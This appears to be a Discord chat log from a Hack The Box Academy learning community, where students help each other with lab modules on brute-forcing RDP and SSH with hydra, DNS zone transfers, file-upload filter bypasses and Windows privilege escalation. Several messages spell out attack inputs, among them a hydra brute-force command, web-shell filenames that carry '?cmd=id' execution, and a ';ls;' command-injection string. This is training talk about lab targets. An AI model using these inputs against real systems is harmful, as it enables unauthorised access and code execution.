use hydra

if you can type here, you can watch videos and google things. try watching some videos

my hydra does not work with smb for some reason

target a different service.

Dude I'm talking about hacking.
Most of hacking tutorial are about practical topics

just tried a different service with hyrda and estimation is 17 hours

what service is that?

rdp

oh, it works but it takes a while.

hydra is generally faster than cme tho.

There are a lot of videos about hacking. Some explain stuff how it works, like ippsec etc
But without a laptop it's gonna be hard

Yeah

is this correct?

The box is going to expire before it completes.

I'm also reading some books but

cant you extend it?

extend it?

the time of the box

yeah max 6 hours

yes.

hydra states 18 hours

I mean htb offers a pwnbox aswell so you dont need to have a "good laptop" you can just boot up the pwnbox and start doing the module

that's the time it takes to go through all the passwords, not the time to crack it

well hydra can only work with 4 parralel connections when it comes to rdp

the -t 64 wont do anythting, you just have to be patient

Can we skip the password modul?. After seeing this i dont want to work on this module before coming back to my good pc. I dont want to crack that on my mac/pwnbox

are you supposed to do rdp

sure, buy me gold annual and I'll give you the answers

well it just hit. strange why hyrda hit so fast and cme never got a hit after 2 hours of me running it

well i know why. as usuall it had something to do with sytax. had a capital J instead of lower case on cme.

lol. Ill send a carrier pigeon with a contract

honestly the password module is not bad

all of the mistakes i made are because of syntax mistakes on my part

each module is pretty sraight forward especially on the labs

Ic

just have to go back and litterally follow the steps HTB took in each module.

I am sure cuz there is rdp on the target. that would be the last thing I would go far but hey other than other, it would be cme.

and he says cme has not gotten him anything.

well i tried SMB but it only allows one connection at a time.

and for some reason i can't get Hydra to work with SMB

Then ill guess ill start doing it.... I didnt want to take it since i hate working on mac

the hardest part in the labs though is going to be wroking with bitlocker and mounting the drive

but how do you know if you haven't gotten there?

somone spoiled it in a forum i was in

why would that be hard

well hard is relative because i have never done it and if people are new to password attacks they will probably not have any experiance with it like me

just use a windows vm for those

lmaooo

@dark carbon i guess we are in the same page, i wanna learn some cool hacking skills , rn now all i have is time to learn it.

you should really exhaust your options before checking stuffs like that.

i agree

Accept it

i did

yes, we need to understand which task requires what to investigate. i've another query, we dont have all tools in this target's section. how are we supposed to perform DF investigation?

Guys I’ve been struggling with this task for over 24hrs it’s the IDS/IPS module

There is a file named pipekatposhc2.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to WMI execution. Add yet another content keyword right after the msg part of the rule with sid 2024233 within the local.rules file so that an alert is triggered and enter the specified payload as your answer. Answer format: C____e

with the tools you have on the target machine

you have everything you need to complete the skills assessment

have you read the article? it helps a lot with this question

http://./[#0](/guild/473760315293696010/channel/0/): ://./#0

Ahh it dosent work on mobile

Active subdomain enum module on information gathering web edition I’m not able to nslookup on inlanefreight.htb I have enlisted it with the target IP on etc/hosts what am I doing wrong?

which question is that?

can i ask the ques ? i have the path of Laudanum aspx web shell located on Pwnbox but i submit it, it alert wrong

did you include /xxx.aspx?

oh, i miss it, thanks

Nslookup doesnt take stuff out from etc/hosts. Need to put IP in the command

nslookup -type=NS <target_IP>
As in this way?

Submit the FQDN of the name server for inlanefreight.htb domain

Nslookup -type=NS inlanefreight.htb <targetIP>

^

🙏

With that you tell nslookup to access inlanefreight.htb you need to go through the IP

Or else it will take i think 1.1.1.1 dns server, which inlanefriehgt.htb cant be acessed from

Ahh okay thanks gotcha

A lot of tools wont look at etc/hosts are route properly, thats why it doesnt work just having it in the file

can i DM you about this?

it will use rather use the default resolver configured on your system.
might not necessarily be 1.1.1.1 or even 8.8.8.8

How do they resolve the domain names that aren’t known to dns server then?

nslookup -type=any -query=AXFR inlanefreight.htb <target_IP> ns.inlanefreight.htb
This isn’t working for me tho

Right sorry yes you are correct. Depends on what you configured. But many ppl default is 1.1.1.1.

you should really understand the commands you are issuing mate.

Well ofc it isnt. You are using the command wrong

I thought for looking up for zonetransfers we need to assign which nameserver it should query to isn’t it so?

So you want to look for zonetransfers in ns.inlanefreiht.htb? Then why do you use inlanefreight.htb?

No, Iam looking in inlanefreight.htb and using ns.inlanefreight.htb as it’s nameserver to query to

Bro got that 2019 hakr ahh name (joke btw no offense)

🤣

You dont need to put Another x.inalnefriehgt.htb in your command if you want to look for anything.
Just one is enough

Example

Nslookup -type=ns ns.inlanefreight.htb <IP>

Or whatever ither subdomain you want to use instead of ns. You dont need to specify any other nameservers since you already gave nslookup the 2 needed ones

So if you want to search for zone transfers

Nslookup -type=any -query=axfr ns.inlanefreigjt.htb <IP>

Not all subdomains are zone transfarable

can anyone help me with the module Password Attacks: Network and Services part 3? I have been running: hydra -L username.list -P password.list rdp://10.129.83.0 many times now, I can't find any legit usernames/passwords after a few hours

Looks like I also need to look back this topic in htb (it was confusing a little bit)

I prefer dig over nslookup

So here the IP should be of target machine or the IP of ns.inlanefreight.htb?

Idk which lab you speak about but you may try new wordlists

And isnt it weird to use username.list as it may take a lot of time

Target machine.

I think the lab asks to use that user/pass list, but I'll try another set of users

yeah, afaik nslookup is depreciated

inlanefreight.htb is the domain name you want to query.
10.129.40.151 is the IP address of the DNS server you're instructing nslookup to use to perform the query.

Example: i want to visit inlanefreight.htb but cant

But then i found a tunnel(target Ip) which leads me to the inlanefreight.htb
Same thing applies if you want to look for other subdomains

Since you already have acccess to inlanefreight.htb you have acccess to other subdomains in that module.
So for other subdomains you keep using the same tunnel(target IP which was given to you by the website)

Thazs just a rough example

Thanks

Oh I didnt know, if lab asks just use it. Sadly I am in university rn so I cant look lab to help

Just maintain the wordlists you used from the previous question

No problem, do I need any other flags to slow the search down? Or run the command as is?

No

bruteforcing rdp is slow.

Nooo my 50€ steam gift

mods took it for themself

@dark carbon Step 1: Get a computer; Step 2: Learn to hack on Hack The Box Academy. It's up to you how you solve those steps but that's going to be the best recommendation. HTB Academy is a lightning track forward. Learning other ways honestly can waste years of your time.

Then grind.

And if your first impulse is to make excuses for why you can't get a computer or money for HTB Academy take it as your first introduction to applying the hacker mindset. You have a problem. It's up to you to find a solution to this. Ask your parents, school, job, whatever you need to do. Use your library's computer. If you have the will, you will find a way.

Thx

Welcome!

guys , i spawned the skill assessment for window priv esc module and i can't ping the ip for weeks

by default windows has ping turned off so you won't get a reply back

Try to scan it instead

Hi, I have been doing the Shells and Payloads | Skills Assessment section. For Host-1 and Host-2 enumeration, the username and password is given as "hints". But I feel that those information should have been provided in the question section. Why are they on hints? Can we find the password by ourselves by bruteforcing? Also, isn't there another module for password cracking? Then, why are we asked to do that in this module? Doesn't that diminish the purpose of this module?

well it's strange , i did try to scan it , and still nothing , i was able to do it normally like 2-3 weeks ago , but not now

Switch your vpn servers maybe.

use the -Pn argument in nmap when you are scanning

yes this helps thank you guys

The username and password for both the blog and tomcat can be found ||on one of those 4 machines ||. You dont need any bruteforcing

||hello everyone, I want to ask about skill assessment II on active directory enumeration and attacks. why are the responder results on Linux hosts (foothold) and Windows different? On the Windows host, we can get new credentials, namely CT***. Why could that happen?||

because it's not a brodcast, it's a direct connection to that host only

thank you for the answer!

can anyone confirm that sharing badges functionality in the academy is actually working ?

Yes, it works perfectly for me

Argh I'm stuck at one question in the Windows Event Logs & Finding EVIL, question 3 at the skill assessment. Anyone here that could offer a hand? I identified the process that executed unmanaged powershell code in the question before, but I am at a loss of how to "determine the process that injected into the process that executed unmanaged PowerShell code. " Can anyone help me?

there's a specific event ID that you can filter for relating to process injection. https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#events

ha! great, I found the solution. Thank you.

I am stuck in Passwords Attack. Bruteforcing Sam user password with muted list. I have tried hydra with maximum threads and crackmapexec, it is very slow.

I have tried bruteforcing both ftp as well as ssh

hello i'm stuck on this module https://academy.hackthebox.com/module/116/section/1512 , i verified all transfer zone but nothing, also i use subbrute on inlanefreight.htb but nothing, someone can help me pls 🙂

when you used subbrute, what did you get?

GM all! Working on the Responder module in the Starting Point and having some issues. Running kali, openvpn, and firefox on a VirtualBox VM and the NetNTLMv doesn't seem to be getting caught by Responder, despite the URL returning the same data as the Walkthrough. I'm guessing it's an issue with the OpenVPN tunnel from Kali VM through my Windows laptop?

I even did subbrute on this domain

make sure you've connected to the vpn and use responder to listen on the vpn's ip, anything else, ask in #starting-point

Hello, I'm stuck on the "FILE UPLOAD ATTACKS (Whitelist Filters)" module. I can't find the solution. I manage to upload the shell because I get a "File successfully uploaded" message, but I can't access it because I get a 404 error on the page. I tried the following:
||test.pHp%0a.jpg?cmd=id||
||test.pHp.jpg?cmd=id||
||test.pHp%0a.jpg?cmd=id||

No need to check with a public server: there's multiple things that may pop up, ns is only one of them

off topic, anyone know why i don't have permission to talk in general chat?

Because you need to read and follow #welcome

Thank you, got it going now. I appreciate it!

judging from the error you getting, seems like you couldn't even access the uploaded file.

its not all the extentions that can execute php code.

it should display another error iirc

Yet it was indeed uploaded correctly.

i dont quite remember but afaik you can bypass it alright but it wont exec

Hey, I just started "windows command line module". Should I go through the 'CMD' sections or can I start directly with powershell sections?

try and upload a simple a php code that executes "hello world" or something

k

when it works you know that ext. can execute code

since it's blacklisted and whitelisted, you can just fuzz for allowed extensions as they display different error : "Only Images Allowed" and then bypass the whitelist filter as shown in the section with every allowed extension till you find the executable one

plus those 00% ext dont work, look through them. the ext..ext ones work

Ok i will try this

Hello, I need help with the Web Server Pivoting with Rpivot I cannot set up server. py. Im using the Pawnbox. Im getting error with python2.7 and changed to python3 but every time I run the python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0 Im getting some kind of error i need to install a module which i install everytime then there is an error with the config.py file aftwerwards is the hook.py etc.

sa try hard fort mdrrr

Mdr 👀

J'suis kéblo depuis 2h sur une question à la con ça rend ouf

je te comprend meme moi j'était bloqué sur un truc a la con x)

https://academy.hackthebox.com/module/57/section/516

can i get help here I'm using cupp for a word list I'm doing what the hint says and using the filters to make the word list only contain special char etc and still not getting anywhere any tips?

@acoustic owl Sorry for tagging i would love a hint of how much i should detail in the cupp tool if you remember (If it is wrong to tag you please tell me🙏 )

@soft cedar @crystal steeple I had found the solution from the start... except that the file needed to be ||URL encoded|| to be accessible in the browser..
The %20 in the file equals ||%2520|| in a URL.. So with that, it works: ||shell.phtml%2520.jpg?cmd=id||
Ty for your help 🫶

Enter as little data as possible. || Last name and first name and then test it ||

Thats what I'm doing after filtering I'm getting around 2300 passwords

I waited for hydra to try them all and nothing

I tried with capital letter and without

even tried adding the birthday

😦

At the end you will be asked four questions. You don't know any keywords, but you should think about the remaining questions again.

I'm at the skill assessment trying to brute force the ssh

does it matter if i start the name with a capital letter like so "Harry" or not?

I don't know. But I wrote the name in this way: Firstname Lastname

solved , thank you

Alright, thanks.

My List: || [+] Saving dictionary to ***.txt, counting 5740 words ||

Hmm so you didnt filter with sed -ri

Cool thanks

Can I get a hint on HTTP Attacks --> HTTP Response Splitting?

You taking the cwee path?

yes

Cool gl

Did you read the hint?

I can't send any picture idk why

read and follow #welcome then you can upload pictures

I see the hint. Just working on trying to get the initial xss. Trying to get a work around for the additional header that the target shows that the example doesnt

Read the hint carefully.
Then get the admin to visit the page.

Idk why i thought the username is harry because when i tried to ssh with that username it gave me a password attempt but that was not the case

I'm so dumb

now I'm in the using web proxy model-automatic modification, I practiced many time about the challenges above it so it is about how to set specific settings to modify anything automatically. Now I'm in the exercise that says Exercise 2: Try adding a rule that automatically adds ;ls; when we click on Ping, by matching and replace the request body of the Ping request. I exactly I don't know what should I put in Burb suite settings (shown in this message) should I write the the instructions like that by HTML format or like headers format

intercept the outgoing request and check where to inject the command

Colleagues, good afternoon, I have a query in relation to this question, please list the server carefully and look for the flag.txt file. Please submit the contents of this file in response. What I understand is that I have to change the permission, that's what I have in mind

brother you're gonna have to tell us what module and section you're working on

module Footprinting Skills Assessment Footprinting easy lab

scan; check what you can see

you don't generally need to change permission unless you get an id_rsa file

السلام عليكم

English

عربي

#rules this is an english only server

متأكد

Dude is trolling

Hey

Do we tag RULE BREAK?

@sly gulch🇺🇸 Only

H4Z3COR3

Hello

Someone who can tell me how to do it

use the tools and techniques shown in the module

take it one step at a time; scan and enumerate

I think I need to add the private key to the attacking machine in order to gain access

nope

look at the open ports and see what different protocols they map to

I have listed with autorecon as such and well I have the information I want now I must perform the construction of the command

Where exactly are you stuck?

you don't need autorecon

good 'ole nmap will get you the initial info needed

Permission denied (publickey)

yes

you can find that using given info from the overview

reading the overview will give you a user's credentials with which you can log into one of the open services with

(where you can get the id_rsa file)

tried encoding special chars multiple times, and I still cant get a basic xss payload to run

hello , i have a dumb question, in most sections in windows privesc module, we escalate privesc to system admin privilege , what is the difference between local admin in that machine and system admin privilege?

trinity??

as a local admin can perform any operation in the machine no? what is the system level privilege is and where would we need it then

@fathom pendant trinity??

?

https://academy.hackthebox.com/module/112/section/1078 @rustic sage this is what you're working on yeah?

read the text carefully

system has higher privileges, it literally represents the system itself, used to carry out OS tasks and cannot be logged in normally

there's a username:password

You said footprinting easy lab?.

It's a password credential that I found in a hash that has been decrypted in the previous questions

hey could someone help me with attacking common services?

@fringe urchin yes

That password was from IPMI section. They have 0 relation

Do you have the credentials for easy lab?

the first question it says "What port is the FTP service running on?" i tried scanning all ports both udp and tcp. tried looking for dns using dig. but found nothing.

but why does having local admin privilege doesn't imply getting system level privilege?

i don;t understand exactly the difference besides admin has an account and system doesn;t

because they're two different accounts

makes sense

administrator is a standard local user account, system is a system account which is not controlled by a user

Example: local admin: the hamster living in my house
System admin: me

so ppl can configure their system account password to be different than the standard local admin user acount?

no, you can't login as system, it doesn't have a password

@fringe urchin I thinked

i implore you to read the text of this section

so in our own machine, windows machine, we can't escalate to system ?

Perfect, again, I'll read it because I don't want to be guided because the idea is to solve it on my own, anyway I'll read the guide again

there's no major digging again

there is no guide

I have a little problem, I can not use my RCE function given in the lesson : https://academy.hackthebox.com/module/145/section/1298

it literally, and explicitly, tells you in the easy assessment that there's a username:password that your colleagues found @rustic sage

you can with extra steps, the psexec.exe from sysintermals can be used

the fact that they made this part EASIER and people still struggle lmao

i see , i think i understand now

fun fact, you used to either need to use the hint, or bruteforce the user/pass

so when they said in a section that getting system privilege in a domain-joined machine is basically getting foothold, because we would then be able to enumerate the domain which requires only system privilege and not local admin privilege?

Used to? Damn wtf. And they didnt covered bruteforcing till a few modules later

SOL; but tbh it was given in the hint ¯_(ツ)_/¯

I don't understand

who uses hints of you have marcieLee and Xreous

no; getting system means having 'NT AUTHORITY\SYSTEM' on the machine

it's equivalent to getting root

You only needs valid domain creds to enumerate the domain, why you need system privileges ?

system permissions may have more permissions than domain creds :)

correct, the distinction is that since the local administer account is a local account, it's not regnoised by the domain and you can't use it within the domain, only on the machine itself. but if you're system, you're effectively using the machine account i.e MS01$, which is a valid domain account

i dont't remember which section in the windows privesc, maybe in the intro, that when gettin a rev shell for example, and after escalating to system level we would only get then the foothold

@fathom pendant could you help

thank you very much

That's true

try respawning the machine

i understand now the purpose of escalating to system

i did